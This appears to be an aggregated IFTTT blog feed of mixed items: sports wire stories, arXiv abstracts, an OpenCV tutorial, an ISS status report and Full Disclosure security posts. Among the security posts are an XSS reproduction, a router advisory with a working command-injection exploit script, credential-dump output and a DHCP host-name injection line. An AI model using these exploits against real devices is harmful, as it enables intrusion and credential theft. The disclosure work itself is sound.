issue is existing in the main service values the other services can be affected by the issue too. Exploitation of the mail encoding and web-server validation vulnerability requires low or medium user interaction and no privileged customer application user account. Successful exploitation of the persistent mail encoding web vulnerability results in session hijacking, persistent phishing attacks, persistent redirects to external malicious source and persistent manipulation of affected or connected module context. Request Method(s): [+] POST Vulnerable Module(s): [+] landing/white-glove-onboarding > Help Form Vulnerable Parameter(s): [+] comments Affected Module(s): [+] We`ve received your email Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers without privileged application user account and with low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce ... 1. Open the foxcart service 2. Surf to the vulnerable conatct form url 3. Inject random value to the inputs and inject to the comments your script code payload 4. Save the entry 5. Redirect via Refresh Referer to confirm the contact request 6. Check inbox of the contact mail input 7. The code executes in the comments body section 8. Successful reproduce of the vulnerability!

Source: Gmail -> IFTTT-> Blogger

[FD] UDID+ v2.5 iOS - Mail Command Inject Vulnerability

Dortmund heads to Belarus or Austria in Europa League

NYON, Switzerland (AP) Borussia Dortmund will start its first Europa League campaign in five years against Shakhtyor Soligorsk or Wolfsberger in the third qualifying round.

from FOX Sports Digital http://ift.tt/1Lez8FX
via IFTTT

Liverpool beats Brisbane Roar 2-1 on late James Milner goal

BRISBANE, Australia (AP) James Milner scored the winner in the 75th minute to give Liverpool a 2-1 comeback win over A-League club Brisbane Roar in a friendly match Friday in front of more than 50,000 fans at Suncorp Stadium.

from FOX Sports Digital http://ift.tt/1CL9Yf9
via IFTTT

Monaco draws Young Boys in Champions League qualifiers

NYON, Switzerland (AP) Monaco, a Champions League quarterfinalist last season, has been paired with Young Boys in the third qualifying round of this season's competition.

from FOX Sports Digital http://ift.tt/1HyCQ9o
via IFTTT

NSA Releases Open Source Network Security Tool for Linux

The United States National Security Agency (NSA) has released a network security tool for Government and the private sectors to help secure their networks against cyber attacks. Dubbed Systems Integrity Management Platform (SIMP), the tool is now publicly available on the popular source code sharing website GitHub. According to an official release from NSA, SIMP makes it easier for

from The Hacker News http://ift.tt/1HUdcsC
via IFTTT

problem with anonymous function in executable

I have a three files that work perfectly. However when I compile them matlab behaves as if I didn't include one of the files even though it is included in ...

from Google Alert - anonymous http://ift.tt/1I81ZeD
via IFTTT

How to Crack RC4 Encryption in WPA-TKIP and TLS

Security researchers have developed a more practical and feasible attack technique against the RC4 cryptographic algorithm that is still widely used to encrypt communications on the Internet. Despite being very old, RC4 (Rivest Cipher 4) is still the most widely used cryptographic cipher implemented in many popular protocols, including: SSL (Secure Socket Layer) TLS (Transport Layer

from The Hacker News http://ift.tt/1I7WvAm
via IFTTT

Pellegrini won't play Sterling in 1st Australian match

GOLD COAST, Australia (AP) Manchester City won't play new signing Raheem Sterling in Saturday's match against sister club and A-League side Melbourne City on the Gold Coast.

from FOX Sports Digital http://ift.tt/1Gpt59r
via IFTTT

50 Miles on Pluto

A 50 mile (80 kilometer) trip across Pluto would cover the distance indicated by the scale bar in this startling image. The close-up of the icy world's rugged equatorial terrain was captured when the New Horizons spacecraft was about 47,800 miles (77,000 kilometers) from the surface, 1.5 hours before its closest approach. Rising to an estimated 11,000 feet (3,500 meters) the mountains are likely composed of water ice. Suggesting surprising geological activity, they are also likely young with an estimated age of 100 million years or so based on the apparent absence of craters. The region pictured is near the base of Pluto's broad, bright, heart-shaped feature. via NASA http://ift.tt/1M74PAm

Thursday, July 16, 2015

Optimizing the computation of overriding. (arXiv:1507.04630v1 [cs.AI])

We introduce optimization techniques for reasoning in DLN---a recently introduced family of nonmonotonic description logics whose characterizing features appear well-suited to model the applicative examples naturally arising in biomedical domains and semantic web access control policies. Such optimizations are validated experimentally on large KBs with more than 30K axioms. Speedups exceed 1 order of magnitude. For the first time, response times compatible with real-time reasoning are obtained with nonmonotonic KBs of this size.

from cs.AI updates on arXiv.org http://ift.tt/1I7kvn9
via IFTTT

Black-Box Policy Search with Probabilistic Programs. (arXiv:1507.04635v1 [stat.ML])

In this work, we explore how probabilistic programs can be used to represent policies in sequential decision problems. In this formulation, a probabilistic program is a black-box stochastic simulator for both the problem domain and the agent. We relate classic policy gradient techniques to recently introduced black-box variational methods which generalize to probabilistic program inference. We present case studies in the Canadian traveler problem, Rock Sample, and a benchmark for optimal diagnosis inspired by Guess Who. Each study illustrates how programs can efficiently represent policies using moderate numbers of parameters.

from cs.AI updates on arXiv.org http://ift.tt/1gErlEI
via IFTTT

Overeaters Anonymous

Signature Care Center. Overeaters Anonymous. Date: July 16, 2015. Time: 10:00 AM. A program of recovery from compulsive eating using twelve ...

from Google Alert - anonymous http://ift.tt/1f95BQ6
via IFTTT

Uruguayan soccer legend Alcides Ghiggia dies at 88

MONTEVIDEO, Uruguay (AP) Alcides Edgardo Ghiggia, who scored the winning goal in the final game of the 1950 World Cup to give Uruguay a stunning 2-1 victory over Brazil - still recalled as Brazil's greatest defeat - died on Thursday. He was 88.

from FOX Sports Digital http://ift.tt/1O9Fc0i
via IFTTT

Uruguayan soccer great Alcides Ghiggia dies at 88

MONTEVIDEO, Uruguay (AP) Alcides Edgardo Ghiggia, the Uruguayan soccer great who scored the late winning goal in a stunning 2-1 victory over Brazil in the 1950 World Cup final, has died. He was 88.

from FOX Sports Digital http://ift.tt/1O9Fc07
via IFTTT

French defender Kaboul joins Sunderland from Tottenham

SUNDERLAND, England (AP) French center back Younes Kaboul has joined Sunderland from fellow English Premier League side Tottenham, ending his eight-year spell at White Hart Lane.

from FOX Sports Digital http://ift.tt/1HxQvgX
via IFTTT

Anonymous on Twitter: "Anonymous takes down @DenverPolice union website (@ColoradoFOP ...

... 5h5 hours ago. Anonymous takes down @DenverPolice union website (@ColoradoFOP http://coloradofop.org ) after cops kill #PaulCastaway ...

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/YourAnonNews/status/621470322852802560&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNEk4zt2dIkCmDaKfmoAWkYFeTdiMA
via IFTTT

[FD] Broken, Abandoned, and Forgotten Code, Part 11

Part 11 of Broken, Abandoned, and Forgotten Code is up! In this part, we regenerate the SquashFS filesystem for our exploit firmware. We have to shrink the firmware image down to 4MB from nearly 9MB to avoid crashing the R6200's UPnP daemon. We also add one more field to the firmware header that, if absent, will cause the bootloader to hang. Here's a link to part 11: http://ift.tt/1TF5US7 If you missed my post to Full Disclosure where I introduced the series, here's that: http://ift.tt/1F6IUWA As always I welcome feedback via email or Twitter. I'm @zcutlip. I hope you enjoy it! Cheers, Zach

Source: Gmail -> IFTTT-> Blogger

[FD] double free's in glibc (and tcmalloc/jemalloc)

Re: [FD] 15 TOTOLINK router models vulnerable to multiple RCEs

> Title: 15 TOTOLINK router models vulnerable to multiple RCEs > Advisory URL: http://ift.tt/1I3bM5z > Blog URL: http://ift.tt/1OeiK6K > Date published: 2015-07-16 > Vendors contacted: None > Release mode: 0days, Released > CVE: no current CVE This was my morning LOL: $ curl -O http://ift.tt/1I5iLuO $ unzip TOTOLINK\ N300RG_8_70.bin $ binwalk -e TOTOLINK\ N300RG_8_70.bin DECIMAL HEXADECIMAL DESCRIPTION

Source: Gmail -> IFTTT-> Blogger

[FD] New CVE's to be released the 17th of June.

[FD] SEC Consult SA-20150716-0 :: Permanent Cross-Site Scripting in Oracle Application Express

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

Brazilian club Palmeiras signs Paraguayan striker Barrios

SAO PAULO (AP) Paraguayan striker Lucas Barrios has been officially introduced to Palmeiras fans after signing a three-year contract with the Brazilian club.

from FOX Sports Digital http://ift.tt/1LmSVl8
via IFTTT

Janson Media to Bring Bob Ross to Digital Platforms Worldwide

Bob Ross Inc. is pleased to announce an agreement with Janson Media that will introduce The Joy of Painting with Bob Ross — the most-recognized, most-watched TV art show in history — to digital platforms worldwide. The series has already begun its rollout on Amazon Instant Video and Amazon Prime.

You’ve see Bob Ross before. He is the soft-spoken guy painting happy clouds, mountains, trees in about 26 television minutes, using big housepainting-type brushes and encouraging his audiences with his gentle reminder, “you can do it.”

The Joy of Painting continues to air on television networks and channels worldwide, making The Joy of Painting the most popular art show of all time.

“We are thrilled — no, ‘happy’ actually — to announce this new agreement,” said Jesse Janson, Director of Acquisitions and Digital Media at Janson Media. “We believe The Joy of Painting, long a staple on U.S. public television stations nationwide, will find important new audiences on all of the major digital platforms worldwide, where episodes will be available to Bob Ross fans 24 hours a day, seven days a week, 365 days a year.”

Click here to access: http://bit.ly/BobRossAmazonPrime

For more information, send an email to info@bobross.com or call 1-800-262-7677

from The 'hotspot' for all things Bob Ross. http://ift.tt/1M7XSyS
via IFTTT

FIFA ethics panel wants to lift strict secrecy rules

ZURICH (AP) FIFA's ethics committee wants to lift secrecy rules that protect accused officials from being identified and keep case details private.

from FOX Sports Digital http://ift.tt/1V7kwLD
via IFTTT

Where did SIFT and SURF go in OpenCV 3?

If you’ve had a chance to play around with OpenCV 3 (and do a lot of work with keypoint detectors and feature descriptors) you may have noticed that the SIFT and SURF implementations are no longer included in the OpenCV 3 library by default.

Unfortunately, you probably learned this lesson the hard way by opening up a terminal, importing OpenCV, and then trying to instantiate your favorite keypoint detector, perhaps using code like the following:

$ python
>>> import cv2
>>> detector = cv2.FeatureDetector_create("SIFT")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'module' object has no attribute 'FeatureDetector_create'

Oh no! There is no longer a

cv2.FeatureDetector_create

method!

The same is true for our

cv2.DescriptorExtractor_create

function as well:

>>> extractor = cv2.DescriptorExtractor_create("SIFT")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'module' object has no attribute 'DescriptorExtractor_create'

Furthermore,

cv2.SIFT_create

and

cv2.SURF_create

will fail as well:

>>> cv2.SIFT_create()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'module' object has no attribute 'SIFT_create'
>>> cv2.SURF_create()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'module' object has no attribute 'SURF_create'

I’ll be honest — this had me scratching my head at first. How am I supposed to access SIFT, SURF, and my other favorite keypoint detectors and local invariant descriptors if

cv2.FeatureDetector_create

and

cv2.DescriptorExtractor_create

have been removed?

The

cv2.FeatureDetector_create

and

cv2.DescriptorExtractor_create

were (and still are) methods I used all the time. And personally, I really liked the OpenCV 2.4.X implementation. All you needed to do was pass in a string and the factory method would build the instantiation for you. You could then tune the parameters using the getter and setter methods of the keypoint detector or feature descriptor.

Furthermore, these methods have been part of OpenCV 2.4.X for many years. Why in the world were they removed from the default install? And where were they moved to?

In the remainder of this blog post, I’ll detail why certain keypoint detectors and local invariant descriptors were removed from OpenCV 3.0 by default. And I’ll also show you where you can find SIFT, SURF, and other detectors and descriptors in the new version of OpenCV.

Why were SIFT and SURF removed from the default install of OpenCV 3.0?

SIFT and SURF are examples of algorithms that OpenCV calls “non-free” modules. These algorithms are patented by their respective creators, and while they are free to use in academic and research settings, you should technically be obtaining a license/permission from the creators if you are using them in a commercial (i.e. for-profit) application.

With OpenCV 3 came a big push to move many of these “non-free” modules out of the default OpenCV install and into the opencv_contrib package. The

opencv_contrib

packages contains implementations of algorithms that are either patented or in experimental development.

The algorithms and associated implementations in

opencv_contrib

are not installed by default and you need to explicitly enable them when compiling and installing OpenCV to obtain access to them.

Personally, I’m not too crazy about this move.

Yes, I understand including patented algorithms inside an open source library may raise a few eyebrows. But algorithms such as SIFT and SURF are pervasive across much of computer vision. And more importantly, the OpenCV implementations of SIFT and SURF are used by academics and researchers daily to evaluate new image classification, Content-Based Image Retrieval, etc. algorithms. By not including these algorithms by default, more harm than good is done (at least in my opinion).

How do I get access to SIFT and SURF in OpenCV 3?

To get access to the original SIFT and SURF implementations found in OpenCV 2.4.X, you’ll need to pull down both the opencv and opencv_contrib repositories from GitHub and then compile and install OpenCV 3 from source.

Luckily, compiling OpenCV from source is easier than it used to be. I have gathered install instructions for Python and OpenCV for many popular operating systems over on the OpenCV 3 Tutorials, Resources, and Guides page — just scroll down the Install OpenCV 3 and Python section and find the appropriate Python version (either Python 2.7+ or Python 3+) for your operating system.

How do I use SIFT and SURF with OpenCV 3?

So now that you have installed OpenCV 3 with the

opencv_contrib

package, you should have access to the original SIFT and SURF implementations from OpenCV 2.4.X, only this time they’ll be in the

xfeatures2d

sub-module through the

cv2.SIFT_create

and

cv2.SURF_create

functions.

To confirm this, open up a shell, import OpenCV, and execute the following commands (assuming you have an image named

test_image.jpg

in your current directory, of course):

$ python
>>> import cv2
>>> image = cv2.imread("test_image.jpg")
>>> gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
>>> sift = cv2.xfeatures2d.SIFT_create()
>>> (kps, descs) = sift.detectAndCompute(gray, None)
>>> print("# kps: {}, descriptors: {}".format(len(kps), descs.shape))
# kps: 274, descriptors: (274, 128)
>>> surf = cv2.xfeatures2d.SURF_create()
>>> (kps, descs) = surf.detectAndCompute(gray, None)
>>> print("# kps: {}, descriptors: {}".format(len(kps), descs.shape))
# kps: 393, descriptors: (393, 64)

If all goes well, you should be able to instantiate the SIFT and SURF keypoint detectors and local invariant descriptors without error.

It’s also important to note that by using

opencv_contrib

you will not be interfering with any of the other keypoint detectors and local invariant descriptors included in OpenCV 3. You’ll still be able to access KAZE, AKAZE, BRISK, etc. without an issue:

>>> kaze = cv2.KAZE_create()
>>> (kps, descs) = kaze.detectAndCompute(gray, None)
>>> print("# kps: {}, descriptors: {}".format(len(kps), descs.shape))
# kps: 359, descriptors: (359, 64)
>>> akaze = cv2.AKAZE_create()
>>> (kps, descs) = akaze.detectAndCompute(gray, None)
>>> print("# kps: {}, descriptors: {}".format(len(kps), descs.shape))
# kps: 192, descriptors: (192, 61)
>>> brisk = cv2.BRISK_create()
>>> (kps, descs) = brisk.detectAndCompute(gray, None)
>>> print("# kps: {}, descriptors: {}".format(len(kps), descs.shape))
# kps: 361, descriptors: (361, 64)

Summary

In this blog post we learned that OpenCV has removed the

cv2.FeatureDetector_create

and

cv2.DescriptorExtractor_create

functions from the library. Furthermore, the SIFT and SURF implementations have also been removed from the default OpenCV 3 install.

The reason for SIFT and SURF removal is due to what OpenCV calls “non-free” algorithms. Both SIFT and SURF are patented algorithms, meaning that you should technically be getting permission to use them in commercial algorithms (they are free to use for academic and research purposes though).

Because of this, OpenCV has made the decision to move patented algorithms (along with experimental implementations) to the opencv_contrib package. This means that to obtain access to SIFT and SURF, you’ll need to compile and install OpenCV 3 from source with

opencv_contrib

support enabled. Luckily, this isn’t too challenging with the help of my OpenCV 3 install guides.

Once you have installed OpenCV 3 with

opencv_contrib

support you’ll be able to find your favorite SIFT and SURF implementations in the

xfeatures2d

package through the

cv2.xfeatures2d.SIFT_create()

and

cv2.xfeatures2d.SURF_create()

functions.

The post Where did SIFT and SURF go in OpenCV 3? appeared first on PyImageSearch.

from PyImageSearch http://ift.tt/1TEUYE6
via IFTTT

Barcelona posts over 600 million euros in revenue

BARCELONA, Spain (AP) Barcelona says it made over 600 million euros ($650 million) in revenue last season, when it won a rare treble of titles including the Champions League.

from FOX Sports Digital http://ift.tt/1Go92Za
via IFTTT

ISS Daily Summary Report – 07/15/15

NanoRack Cubesat Deployer (NRCSD) Operations: Overnight and this morning ground teams deployed 6 more Cubesats for a total of 12 of 16 planned. Final deployments are scheduled for 5:50 PM CDT today and 12:30 AM CDT tomorrow. The complement consists of 14 Planet Lab Doves, 1 Arkyd-3 and 1 Centennial-1 satellite. Integrated Resistance and Aerobic Training Study (Sprint) Volume of Oxygen Utilized (VO2) Exercise Session: Kelly performed his Sprint exercise session on the Cycle Ergometer with Vibration Isolation and Stabilization (CEVIS). He donned Electrocardiogram (ECG) electrodes, Heart Rate Monitor (HRM) hardware, and Portable Pulmonary Function System (PPFS) calibrations and executed the VO2 protocol. The Sprint investigation evaluates the use of high intensity, low volume exercise training to minimize loss of muscle, bone, and cardiovascular function in ISS crewmembers during long-duration missions. Upon completion of this study, investigators expect to provide an integrated resistance and aerobic exercise training protocol capable of maintaining muscle, bone and cardiovascular health while reducing total exercise time over the course of a long-duration space flight. This will provide valuable information in support of investigator’s long term goal of protecting human fitness for even longer space exploration missions. Syringe inspection of Plant Gravity Sensing 2 (PGS-2): Earlier this month when Kelly removed a seed paper kit from a Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) he noted an anomaly with the seeds which was due to contamination in the dish. Today he inspected the condition of the culture medium in the syringe of Plant Gravity Sensing. This task continues the investigation into the PGS-2 contamination. Synchronized Position Hold, Engage, and Reorient Experimental Satellites (SPHERES) Slosh: Kelly stowed charged batteries and installed additional batteries for charging for the upcoming SPHERES Slosh session scheduled for Friday. The investigation uses small robotic satellites to examine how liquids move around inside containers in microgravity. A water bottle’s contents slosh around differently in space than on Earth, but the physics of liquid motion in microgravity are not well understood, which affects computer simulations of liquid rocket fuel behavior. Middle school and high school students control the SPHERES to study how liquids behave inside containers in space, which increases the safety and efficiency of future rockets. VEG-01: Kelly thinned seedlings so that each Veg-01 Plant Pillow contains one plant and refilled the root mat water in the Veggie facility as scheduled. Veggie provides the necessary lighting and nutrient delivery for efficient plant growth in space. The Veg-01 investigation is used to assess on-orbit function and performance of the Veggie facility, focusing on the growth and development of ‘Outredgeous’ Lettuce (Lactuca sativa) seedlings in the spaceflight environment. It is also used to determine the effects of the spaceflight environment on composition of microbial flora on the plants and the Veggie facility. General Laboratory Active Cryogenic ISS Experiment Refrigerator (GLACIER) Desiccant Pack Swap: Kelly removed desiccant from Glacier-5 and replaced with fresh desiccant as part of standard conditioning. Carbon Dioxide Removal Assembly (CDRA) Status: N3 CDRA has been commanded to standby in preparation for tomorrow’s maintenance to recover the Air Selector Valve (ASV) 104. After the ASV 104 R&R, the crew will conduct additional N3 CDRA Leak Check steps. The Lab CDRA is currently operating to remove CO2. Onboard ppCO2 is currently at 2.0 mmHg. Today’s Planned Activities All activities were completed unless otherwise noted. 24-hour BP Monitoring (end) r/g 9337 SPHERES – Battery Charging SPRINT – Hardware Warmup JEM Mesh Cover Grille Cleaning 24-hour BP Monitoring (start) r/g 9337 Installation of Voltage Converter ПН28-120 r/g 9328 CASKAD. Manual Mixing in Bioreactor / r/g 9277 SPRINT Experiment Ops Installation of Voltage Converter ПН28-120 r/g 9328 WHC – Fill (start) Initiate condensate tank offload to CWC WHC – Fill (end) Station Support Computer (SSC) 20 and 23 Loading Preparation for the arriving crew TV Greetings / r/g 9347 Termination of Condensate Tank Offload to CWC SPHERES – Battery Charging SPRINT – Payload Closeout Ops WRS – Recycle Tank Fill Installation of Voltage Converter ПН28-120 r/g 9328 ТКГ 428 (DC1) Transfers and IMS Ops / ТКГ 428 Transfer Ops [РПР] + r/g 9239, 9253 43S Crew SSC Laptops – Wireless connection SPHERES – Battery Charging VEG-01 – Plant thinning VEG-01 – Water refills Replacement of ЗУ2А (ЭА025М) in FGB БР-9ЦУ-8 system with a new СЗУ-ЦУ8 r/g 9333 VIZIR. Experiment Ops with СКП-И P/L. (S-band) / r/g 9345 SPHERES – Battery Charging GLCR5 – Desiccant Pack Swap JRNL – Journal Entry INTERACTION-2. Experiment Ops / r/g 9343 ABOUT GAGARIN FROM SPACE. HAM Radio Session / r/g 9344 CASKAD. Manual Mixing in Bioreactor / r/g 9277 SPRINT – Close-out Ops and Stowage SPHERES – Battery Charging Crew Discretionary Conference Completed Task List Items None Ground Activities All activities were completed unless otherwise noted. Cubesat deploys 43S SSC crew config SPRINT VO2 ops OASIS video Lab CDRA activation N3 CDRA deactivation Three-Day Look Ahead: Thursday, 07/16: JEMRMS/CubeSat activities, SPHERES Slosh review, N3 CDRA ASV 104 R&R and leak check Friday, 07/17: SPHERES Slosh run Saturday, 07/18: Crew off duty, housekeeping QUICK ISS Status – Environmental Control Group: Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Operate Carbon Dioxide Removal Assembly (CDRA) Node 3 Standby Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Standby Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up

from ISS On-Orbit Status Report http://ift.tt/1LlRjbo
via IFTTT

Ex-Cardiff manager Mackay cleared by English FA over texts

LONDON (AP) The English Football Association will not punish former Cardiff manager Malky Mackay over a dossier of offensive text-message exchanges with a colleague.

from FOX Sports Digital http://ift.tt/1GnXvsM
via IFTTT

Malware And Hacking Forum Seized, Dozens Arrested

The FBI and other law enforcement agencies have arrested more than 70 people suspected of carrying out cyber criminal activities associated with one of the most active underground web forums known as Darkode. Darkode, also used by notorious Lizard Squad, was an online bazaar for cyber criminals looking to buy and sell hacking tools, botnet tools, zero-day exploits, ransomware programs,

from The Hacker News http://ift.tt/1DiLQvo
via IFTTT

Leverkusen signs Jonathan Tah from Hamburger SV

LEVERKUSEN, Germany (AP) Bayer Leverkusen has signed Germany under-19 captain Jonathan Tah from Bundesliga rival Hamburger SV.

from FOX Sports Digital http://ift.tt/1TEiqBk
via IFTTT

Swiss extradite detained FIFA official to the United States

BERN, Switzerland (AP) Swiss authorities say one of the seven FIFA officials arrested in Zurich as part of a U.S. corruption probe has been extradited to the United States.

from FOX Sports Digital http://ift.tt/1DiAQOp
via IFTTT

Swiss authorities say 1 of 7 detained FIFA officials has been extradited to the United States

BERN, Switzerland (AP) Swiss authorities say 1 of 7 detained FIFA officials has been extradited to the United States.

from FOX Sports Digital http://ift.tt/1V6mThT
via IFTTT

I have a new follower on Twitter

Martin Coleman
I help customers #accelerate #cloud, improve customer service, shrink #datacentre, slash #TCO. Over 20 years in #data #storage, at EMC, NetApp, Violin.
Melbourne, Australia
http://t.co/SNpXyO2ZG7
Following: 685 - Followers: 892

July 16, 2015 at 05:17AM via Twitter http://twitter.com/flashstor

[FD] Backdoor and RCE found in 8 TOTOLINK router models

Hello, Please find a text-only version below sent to security mailing-lists. The complete version on analysing the backdoor in TOTOLINK products is posted here: http://ift.tt/1K7V6rf === text-version of the advisory without technical explanations ===

Source: Gmail -> IFTTT-> Blogger

[FD] Backdoor credentials found in 4 TOTOLINK router models

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] 4 TOTOLINK router models vulnerable to CSRF and XSS attacks

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] 15 TOTOLINK router models vulnerable to multiple RCEs

Hash: SHA512 ## Advisory Information Title: 15 TOTOLINK router models vulnerable to multiple RCEs Advisory URL: http://ift.tt/1I3bM5z Blog URL: http://ift.tt/1OeiK6K Date published: 2015-07-16 Vendors contacted: None Release mode: 0days, Released CVE: no current CVE ## Product Description TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO markets in South Korea. TOTOLINK produces routers routers, wifi access points and network devices. Their products are sold worldwide. ## Vulnerabilities Summary The first vulnerability allows to bypass the admin authentication and to get a direct RCE from the LAN side with a single HTTP request. The second vulnerability allows to bypass the admin authentication and to get a direct RCE from the LAN side with a single DHCP request. There are direct RCEs against the routers which give a complete root access to the embedded Linux from the LAN side. The two RCEs affect 13 TOTOLINK products from 2009-era firmwares to the latest firmwares with the default configuration: - TOTOLINK A1004 : until last firmware (9.34 - za1004_en_9_34.bin) - TOTOLINK A5004NS : until last firmware (9.38 - za5004s_en_9_38.bin) - TOTOLINK EX300 : until last firmware (8.68 - TOTOLINK EX300_8_68.bin - totolink.net) - TOTOLINK EX300 : until last firmware (9.36 - ex300_ch_9_36.bin.5357c0 - totolink.cn) - TOTOLINK N150RB : until last firmware (9.08 - zn150rb_en_9_08.bin.5357c0) - TOTOLINK N300RB : until last firmware (9.26 - zn300rb_en_9_26.bin) - TOTOLINK N300RG : until last firmware (8.70 - TOTOLINK N300RG_8_70.bin) - TOTOLINK N500RDG : until last firmware (8.42 - TOTOLINK N500RDG_en_8_42.bin) - TOTOLINK N600RD : until last firmware (8.64 - TOTOLINK N600RD_en_8_64.bin) - TOTOLINK N302R Plus V1 : until the last firmware 8.82 (TOTOLINK N302R Plus V1_en_8_82.bin) - TOTOLINK N302R Plus V2 : until the last firmware 9.08 (TOTOLINK N302R Plus V2_en_9_08.bin) - TOTOLINK A3004NS (no firmware available in totolinkusa.com but ipTIME's A3004NS model was vulnerable to the 2 RCEs) - TOTOLINK EX150 : until the last firmware (8.82 - ex150_ch_8_82.bin.5357c0) The DHCP RCE also affects 2 TOTOLINK products from 2009-era firmwares to the latest firmwares with the default configuration: - TOTOLINK A2004NS : until last firmware (9.60 - za2004s_en_9_60.bin) - TOTOLINK EX750 : until last firmware (9.60 - ex750_en_9_60.bin) Firmwares come from totolink.net and from totolink.cn. - - From my tests, it is possible to use these vulnerabilities to overwrite the firmware with a custom (backdoored) firmware. Concerning the high CVSS score (10/10) of the vulnerabilities and the longevity of this vulnerability (6+ year old), the TOTOLINK users are urged to contact TOTOLINK. ## Details - RCE with a single HTTP request The HTTP server allows the attacker to execute some CGI files. Many of them are vulnerable to a command inclusion which allows to execute commands with the http daemon user rights (root). Exploit code: $ cat totolink.carnage #!/bin/sh if [ ! $1 ]; then echo "Usage:" echo $0 ip command exit 1 fi wget -qO- --post-data="echo 'Content-type: text/plain';echo;echo;PATH=$PATH:/sbin $2 $3 $4" http://$1/cgi-bin/sh The exploits have been written in HTML/JavaScript, in form of CSRF attacks, allowing people to test their systems in live using their browsers: http://ift.tt/1HAFgHE o Listing of the filesystem HTML/JS exploits: http://ift.tt/1OeiK6M Using CLI: root@kali:~/totolink# ./totolink.carnage 192.168.1.1 ls | head ash auth busybox cat chmod cp d.cgi date echo false root@kali:~/totolink# o How to retrieve the credentials ? (see login and password at the end of the text file) HTML/JS exploits: http://ift.tt/1I3bM5D Using CLI: kali# ./totolink.carnage 192.168.1.1 cat /tmp/etc/iconfig.cfg wantype.wan1=dynamic dhblock.eth1=0 ppp_mtu=1454 fakedns=0 upnp=1 ppp_mtu=1454 timeserver=time.windows.com,gmt22,1,480,0 wan_ifname=eth1 auto_dns=1 dhcp_auto_detect=0 wireless_ifmode+wlan0=wlan0,0 dhcpd=0 lan_ip=192.168.1.1 lan_netmask=255.255.255.0 dhcpd_conf=br0,192.168.1.2,192.168.1.253,192.168.1.1,255.255.255.0 dhcpd_dns=164.124.101.2,168.126.63.2 dhcpd_opt=7200,30,200, dhcpd_configfile=/etc/udhcpd.conf dhcpd_lease_file=/etc/udhcpd.leases dhcpd_static_lease_file=/etc/udhcpd.static use_local_gateway=1 login=admin password=admin Login and password are stored in plaintext, which is a very bad security practice. o Current running process: HTML/JS exploits: http://ift.tt/1OeiK6P Using CLI: kali# ./totolink.carnage 192.168.1.1 ps -auxww o Getting the kernel memory: HTML/JS exploits: http://ift.tt/1I3bL1i Using CLI: kali# ./totolink.carnage 192.168.1.1 cat /proc/kcore o Default firewall rules: HTML/JS exploits: http://ift.tt/1OeiJQl Using CLI: kali# ./iptime.carnage.l2.v9.52 192.168.1.1 iptables -nL o Opening the management interface on the WAN: HTML/JS exploits: http://ift.tt/1I3bL1m o Reboot the device: HTML/JS exploits: http://ift.tt/1OeiK6T o Brick the device: HTML/JS exploits: http://ift.tt/1I3bL1o An attacker can use the /usr/bin/wget binary located in the file system of the remote device to plant a backdoor and then execute it as root. By the way, d.cgi in /bin/ is an intentional backdoor. ## Details - RCE with a single DHCP request This vulnerability is the exact inverse of CVE-2011-0997. The DHCPD server in TOTOLINK devices allows remote attackers to execute arbitrary commands via shell metacharacters in the host-name field. Sending a DHCP request with this parameter will reboot the device: cat /etc/dhcp/dhclient.conf send host-name ";/sbin/reboot"; When connecting to the UART port (`screen /dev/ttyUSB0 38400`), we will see the stdout of the /dev/console device; the dhcp request will immediately force the reboot of the remote device: Booting... @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ @ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize @ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h @ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName @ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16 @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ [...] WiFi Simple Config v1.12 (2009.07.31-11:35+0000). Launch iwcontrol: wlan0 Reaped 317 iwcontrol RUN OK SIGNAL -> Config Update signal progress killall: pppoe-relay: no process killed SIGNAL -> WAN ip changed WAN0 IP: 192.168.2.1 signalling START Invalid upnpd exit killall: upnpd: no process killed upnpd Restart 1 iptables: Bad rule (does a matching rule exist in that chain?) Session Garbage Collecting:Maybe system time is updated.( 946684825 0 ) Update Session timestamp and try it after 5 seconds again. ez_ipupdate callback --> time_elapsed: 0 Run DDNS by IP change: / 192.168.2.1 Reaped 352 iptables: Bad rule (does a matching rule exist in that chain?) Jan 1 00:00:25 miniupnpd[370]: Reloading rules from lease file Jan 1 00:00:25 miniupnpd[370]: could not open lease file: /var/run/upnp_pmlist Jan 1 00:00:25 miniupnpd[370]: HTTP listening on port 2048 Reaped 363 Led Silent Callback Turn ON All LED Dynamic Channel Search for wlan0 is OFF start_signal => plantynet_sync Do start_signal => plantynet_sync SIGNAL -> Config Update signal progress killall: pppoe-relay: no process killed SIGNAL -> WAN ip changed Reaped 354 iptables: Bad rule (does a matching rule exist in that 